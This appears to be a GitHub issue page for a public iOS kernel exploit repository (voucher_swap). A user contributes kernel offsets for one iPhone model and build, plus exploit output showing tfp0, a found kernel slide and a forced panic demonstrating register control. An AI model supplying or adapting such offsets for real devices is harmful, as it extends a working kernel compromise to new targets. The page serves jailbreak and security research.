razmashat / voucher_swap

the voucher_swap exploit by @_bazad with offsets for tested devices
45 stars 12 forks source link

{ "iPhone9,2", "16B92", addresses__iphone9_2__16B92 }, #3

Closed Lakr233 closed 5 years ago

Lakr233 commented 5 years ago

static void addresses__iphone9_216B92() { ADDRESS(IOUserClientvtable) = SLIDE(0xfffffff0070cc648); ADDRESS(IORegistryEntry__getRegistryEntryID) = SLIDE(0xfffffff007573f34); }

/ we got tfp0 at: 0xb07 [D] found kernel slide 0x000000000de00000 [D] allocated kernel buffer at 0xffffffe000128000 [+] about to panic: check the panic log to observe PC+register control /